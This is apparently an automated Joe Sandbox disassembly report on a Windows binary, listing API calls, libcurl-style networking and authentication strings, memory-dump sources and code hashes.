    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C74D
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C78C
    • ___std_exception_copy.LIBVCRUNTIME ref: 0063C7BF
    Strings
    Similarity
    • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
    • API String ID: 3941765731-1866435925
    Strings
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    APIs
      • Part of subcall function 006E1482: _free.LIBCMT ref: 006E14A7
    • _free.LIBCMT ref: 006E1784
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E178F
    • _free.LIBCMT ref: 006E179A
    • _free.LIBCMT ref: 006E17EE
    • _free.LIBCMT ref: 006E17F9
    • _free.LIBCMT ref: 006E1804
    • _free.LIBCMT ref: 006E180F
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    APIs
    • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 006D7290
    • __fassign.LIBCMT ref: 006D746F
    • __fassign.LIBCMT ref: 006D748C
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D74D4
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006D7514
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D75C0
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • _memcmp.LIBVCRUNTIME ref: 006D5A6A
    • _free.LIBCMT ref: 006D5ADE
    • _free.LIBCMT ref: 006D5AF7
    • _free.LIBCMT ref: 006D5B35
    • _free.LIBCMT ref: 006D5B3E
    • _free.LIBCMT ref: 006D5B4A
    Similarity
    • API ID: _free$ErrorLast$_memcmp
    • String ID:
    • API String ID: 4275183328-0
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006AA421
    • ___from_strstr_to_strchr.LIBCMT ref: 006AA438
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AA5E6
    Similarity
    • API ID: ___from_strstr_to_strchr$CheckStackVars@8
    • String ID:
    • API String ID: 2899561186-0
    APIs
    • _strlen.LIBCMT ref: 006A8D9B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A927E
      • Part of subcall function 00683DA0: _strlen.LIBCMT ref: 00683DF9
    Strings
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: DIGEST-MD5 handshake failure (empty challenge message)$WDigest$WDigest
    • API String ID: 3286693010-3442488022
    APIs
    Similarity
    • API ID: _strlen
    • String ID:
    • API String ID: 4218353326-0
    APIs
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AB527
    Strings
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Could not DOH-resolve: %s$DOH Host name: %s$DOH: %s type %s for %s$DOH: %s type %s for %s
    • API String ID: 572576967-1638338986
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006A068D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A0A2C
    Strings
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: *$Can't get the size of %s$Can't open %s for writing
    • API String ID: 88142382-3405668039
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0064BD1E
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s$*$*$Connection #%ld to host %s left intact
    • API String ID: 930174750-3007101698
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00692735
    Strings
    • Failed to parse FETCH response., xrefs: 006926FD
    • *, xrefs: 00692480
    • Found %I64d bytes to download, xrefs: 00692553
    • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00692615
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
    • API String ID: 930174750-1642442384
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A4CBF
    Strings
    • %sAuthorization: Negotiate %s, xrefs: 006A4BBF
    • ^, xrefs: 006A4B50
    • Negotiate, xrefs: 006A4B37
    • Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 006A4B0F
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$^
    • API String ID: 930174750-805764584
    APIs
    • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0068D9D0
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068DCDA
    Strings
    • Internal error: Unexpected packet, xrefs: 0068DC89
    • Received too short packet, xrefs: 0068DA3C
    • TFTP error: %s, xrefs: 0068DC29
    Similarity
    • API ID: CheckStackVars@8recvfrom
    • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
    • API String ID: 1850307299-477593554
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Entry path is '%s'$Entry path is '%s'$Failed to figure out path$SYST
    • API String ID: 930174750-3207682939
    APIs
    Strings
    Similarity
    • API ID: _free_strpbrk
    • String ID: *?
    • API String ID: 3300345361-2564092906
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00666227
      • Part of subcall function 00679A90: @_RTC_CheckStackVars@8.LIBCMT ref: 00679B5A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066633E
    Strings
    Similarity
    • API ID: CheckStackVars@8$___from_strstr_to_strchr
    • String ID: %.*s$%sAuthorization: Digest %s$0o
    • API String ID: 2360737596-1021650720
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CAB9
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CB57
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CBDE
    Strings
    • Connection time-out, xrefs: 0068CA75
    • set timeouts for state %d; Total %ld, retry %d maxtry %d, xrefs: 0068CC1D
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID: Connection time-out$set timeouts for state %d; Total %ld, retry %d maxtry %d
    • API String ID: 885266447-3902073479
    APIs
    Strings
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x$Tk
    • API String ID: 3286693010-2113013566
    APIs
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C74D
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C78C
    • ___std_exception_copy.LIBVCRUNTIME ref: 0063C7BF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
    • String ID: ios_base::badbit set$ios_base::failbit set
    • API String ID: 3941765731-1240500531
    • Opcode ID: 326398af31474044a0479cdb8908a6683d4535060a2e74c9ddf11f3bef31dfc2
    • Instruction ID: 932f98bb765575de78a0994c2c998719deea5b57c8459a8f0ee7f80ab50a0668
    • Opcode Fuzzy Hash: 326398af31474044a0479cdb8908a6683d4535060a2e74c9ddf11f3bef31dfc2
    • Instruction Fuzzy Hash: 5A41B4B1900608AFC704DF68C841BEEBBFAEF49320F14811EF915A7781D731A944CBA4
    APIs
    • getsockname.WS2_32(?,?,00000080), ref: 0069AFD9
    • accept.WS2_32(?,?,00000080), ref: 0069B008
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
      • Part of subcall function 006A6A30: ioctlsocket.WS2_32(?,8004667E,?), ref: 006A6A73
      • Part of subcall function 006A6A30: @_RTC_CheckStackVars@8.LIBCMT ref: 006A6A8A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069B121
    Strings
    • Connection accepted from server, xrefs: 0069B049
    • Error accept()ing server connect, xrefs: 0069B02E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen$Failureacceptgetsocknameioctlsocket
    • String ID: Connection accepted from server$Error accept()ing server connect
    • API String ID: 3884559954-2331703088
    • Opcode ID: a17e7c81eda5436a13759667292c6d9f51e75a20b472dceb49bea3ff7e378283
    • Instruction ID: ed57d51db8b3fe87c3d4c506235261358db551d56318b5b4a200f9367da4137e
    • Opcode Fuzzy Hash: a17e7c81eda5436a13759667292c6d9f51e75a20b472dceb49bea3ff7e378283
    • Instruction Fuzzy Hash: 3351D5B5E00208AFDB54DF58DC51BEE77BAEF45300F0442ACE949AB381DB759A84CB91
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %s:%s$%sAuthorization: Basic %s$1og
    • API String ID: 1951014933-3814163928
    • Opcode ID: 69e2ac486dc1399ba56df31c43a15340ffe8c7b5d19c1d5a8b0bc9c729ef6d67
    • Instruction ID: f62559f9ceb6bf2fd1feaefb1c2b896363d753eaf1aa422c6f12c63bc61df7e2
    • Opcode Fuzzy Hash: 69e2ac486dc1399ba56df31c43a15340ffe8c7b5d19c1d5a8b0bc9c729ef6d67
    • Instruction Fuzzy Hash: C7416FB5D00218AFCB14DF98D885BEEB7B6BF48304F148129F809BB351D7359A45CBA6
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A8BE7
    Strings
    • SOCKS5 GSS-API protection not yet implemented., xrefs: 006A8955
    • Failed to send SOCKS5 connect request., xrefs: 006A89B0
    • SOCKS5 connect to %s (remotely resolved), xrefs: 006A8617
    • %s:%d, xrefs: 006A85F7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s:%d$Failed to send SOCKS5 connect request.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 connect to %s (remotely resolved)
    • API String ID: 930174750-2335184823
    • Opcode ID: 1a4eabc1012e3717cd81c58558689436edf360050f9e46ca7458eb8b27b2a6d8
    • Instruction ID: fe424d08a422f7e348fb2610cd61352b3cb6b0c3af8af08268143d26b70f24ea
    • Opcode Fuzzy Hash: 1a4eabc1012e3717cd81c58558689436edf360050f9e46ca7458eb8b27b2a6d8
    • Instruction Fuzzy Hash: 44511BB09049598FCB24DF18DD94BAFB7B2BF85306F1441E8EA08A7381D6356E80CF55
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: identity$identity$identity
    • API String ID: 4218353326-4054963862
    • Opcode ID: 0bb8772956769706baed39fd8f0c708132625591e2d347a0ea29b5a9f538dad1
    • Instruction ID: aa79ec29bff5308220769bb7a7c2653ffa8690ce514e8a8094ec132265b1c565
    • Opcode Fuzzy Hash: 0bb8772956769706baed39fd8f0c708132625591e2d347a0ea29b5a9f538dad1
    • Instruction Fuzzy Hash: C4413DB4D00209EFDB04DFA8D941AAEBBB6BF44308F1441A9D805B7351E731AE41CBA6
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 006623F9
    • WSAGetLastError.WS2_32 ref: 0066241A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066248E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8recv
    • String ID: 3'$Recv failure: %s
    • API String ID: 3739410375-3205223812
    • Opcode ID: f19acfd4baaeb369bc709428cd55f3e7749655fe58f027fc81125a26cb1afa87
    • Instruction ID: e7e5b4ff35e850facc9fd6998c3b13ea8c09d04a11a107d5cb89de6690bb39dc
    • Opcode Fuzzy Hash: f19acfd4baaeb369bc709428cd55f3e7749655fe58f027fc81125a26cb1afa87
    • Instruction Fuzzy Hash: B6319CB5A00609EFCB00DF98D891AAE77BAEF49310F008159F919AB341DB359A44CBD0
    APIs
      • Part of subcall function 006629D0: recv.WS2_32(?,?,?,00000000), ref: 00662B02
    • send.WS2_32(?,?,?,00000000), ref: 00662527
    • WSAGetLastError.WS2_32 ref: 00662548
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006625C3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorFailureLastStackVars@8recvsend
    • String ID: 3'$Send failure: %s
    • API String ID: 2342134196-1925326815
    • Opcode ID: 8f6a29f752ce45c69e7f4431d5680f2618d5a28117178f2d21820a8741edbfd4
    • Instruction ID: 10db9f25af024f469118cca5fa25e83824f487cf2adbfd3bd63f39788963a8e2
    • Opcode Fuzzy Hash: 8f6a29f752ce45c69e7f4431d5680f2618d5a28117178f2d21820a8741edbfd4
    • Instruction Fuzzy Hash: B5318DB5E00609AFCB50EF58D851BEE77B6BF49310F008268F9199B391DA359A44CB90
    APIs
    Strings
    • WSAStartup failed (%d), xrefs: 0068816C
    • insufficient winsock version to support telnet, xrefs: 006881D9
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckCleanupStackStartupVars@8
    • String ID: WSAStartup failed (%d)$insufficient winsock version to support telnet
    • API String ID: 1294282189-1763879679
    • Opcode ID: d95052d08931a31e7b03626d501ec0d6971f77f86e009ec4c1341ead1c9394db
    • Instruction ID: 90f578d9405439be2aecdb905e840ed086b4e75e4a1a954daeac6762350fda6f
    • Opcode Fuzzy Hash: d95052d08931a31e7b03626d501ec0d6971f77f86e009ec4c1341ead1c9394db
    • Instruction Fuzzy Hash: B02135B2E00125AFDB14AB59DC467FDB3B7EF85300F408179F485AB281E97C4A80D3A1
    APIs
    • send.WS2_32(?,000000FF,00000003,00000000), ref: 00688B5D
    • WSAGetLastError.WS2_32 ref: 00688B75
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00688BBF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$ErrorFailureLast_strlensend
    • String ID: SENT$Sending data failed (%d)
    • API String ID: 2661615204-3459338696
    • Opcode ID: 109fc82e4e7ccc237ca4de58e32435d5d285fe469006166510df7fa61c76dfe0
    • Instruction ID: 2acc3f4823a45d32b84346c42067ea7c29ceca2d0fad29a906da61ee84389bb8
    • Opcode Fuzzy Hash: 109fc82e4e7ccc237ca4de58e32435d5d285fe469006166510df7fa61c76dfe0
    • Instruction Fuzzy Hash: 0821D6B1D002499FDB44EFACD885BEE7BB6EB49310F504669F918EB391E6708A40C7D1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _wcsrchr
    • String ID: .bat$.cmd$.com$.exe
    • API String ID: 1752292252-4019086052
    • Opcode ID: 36d1216bd197228dfe7118ddf87383ca4a40c3ad2169e3e7f4b90f8f9caa6960
    • Instruction ID: 44d018e6c15228961ac17fe8a738cb7a8a83e896a9bf6059ff5c6cf2de6ad457
    • Opcode Fuzzy Hash: 36d1216bd197228dfe7118ddf87383ca4a40c3ad2169e3e7f4b90f8f9caa6960
    • Instruction Fuzzy Hash: 28012B37E0836A25761410299C52BF6139B9F92BB0B26402FF884FF3C1DE55EC028599
    APIs
    • SleepEx.KERNEL32(00000000,00000000), ref: 00664929
    • getsockopt.WS2_32(000000FF,0000FFFF,00001007,00000000,00000004), ref: 0066494E
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • WSAGetLastError.WS2_32 ref: 00664961
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006649A5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorFailureLastSleepStackVars@8getsockopt
    • String ID: H'
    • API String ID: 2620147948-3698549401
    • Opcode ID: fec15767a70a3a79d23337778cb2fbb7f430a3d963eabf1a50cc087e4c507ba9
    • Instruction ID: 05db067d8e47a2129ae7812fa1d4a35f130e9b44b22204e2050c6f0c971700d2
    • Opcode Fuzzy Hash: fec15767a70a3a79d23337778cb2fbb7f430a3d963eabf1a50cc087e4c507ba9
    • Instruction Fuzzy Hash: FA219571D04248AFDB50EFACD8457EEBBB59F05300F0081A9E848AB391D7754A84CFD1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: Digest$Digest$Digest
    • API String ID: 4218353326-162757003
    • Opcode ID: 6c7795e63551a8eca37f6d00019c87ec9c2dae474e1d912b752880b6e61716f8
    • Instruction ID: a162cbdf8c1f34cfc25860eef827ec10588c9ec6a7b8af9947bebec290978de4
    • Opcode Fuzzy Hash: 6c7795e63551a8eca37f6d00019c87ec9c2dae474e1d912b752880b6e61716f8
    • Instruction Fuzzy Hash: 8E116AF1E04249ABDF44DF98E942AAE7B76AF51304F14446DFC1587342E631EA208BA5
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strstr
    • String ID: ;mode=$;mode=$N
    • API String ID: 2882301372-2029170996
    • Opcode ID: d008af29099aef458f59056f859e974b72f98230c7f0e32ce3fe63ff603dbd1b
    • Instruction ID: 1a33f76099d9c8e5a747d58d087a5f698df055b757a5aa6abd0a08fc9dfc9001
    • Opcode Fuzzy Hash: d008af29099aef458f59056f859e974b72f98230c7f0e32ce3fe63ff603dbd1b
    • Instruction Fuzzy Hash: 482183B0D04248EFCB04DFA8C4457EDBFB2AB05318F1486E9D4486B342D3759B85CB96
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s (%d) %s (%d)$Malformed ACK packet, rejecting$blksize parsed from OACK$requested
    • API String ID: 3286693010-3904120213
    • Opcode ID: 1e11502139bf5d5c80a8ea9b1ef463949e304f8eb062936d7f1e9890b3b3e8b6
    • Instruction ID: 5f06bc8a58bd258e622873ae9cc4759676e75708aac1b7b7c63a9a710e702078
